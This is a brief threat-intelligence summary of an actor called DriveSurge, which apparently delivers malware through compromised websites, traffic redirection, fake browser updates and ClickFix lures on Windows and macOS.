A sophisticated threat actor named DriveSurge operates as an Initial Access Broker using a Pay-Per-Install model to deliver malware at scale. The actor compromises thousands of legitimate websites and uses zTDS (Traffic Distribution System) to silently redirect visitors to malicious content. Victims encounter either FakeUpdates campaigns that impersonate browser update prompts for 11 different browsers, or ClickFix attacks that trick users into executing malicious commands through fake error messages. DriveSurge's infrastructure utilizes bulletproof hosting services, primarily NiceNIC registrar, and has been operating since at least 2015. The campaigns target both Windows and macOS systems, employing sophisticated obfuscation techniques and clipboard hijacking to achieve infection. Eight technical fingerprints have been identified to track this actor's infrastructure and activities.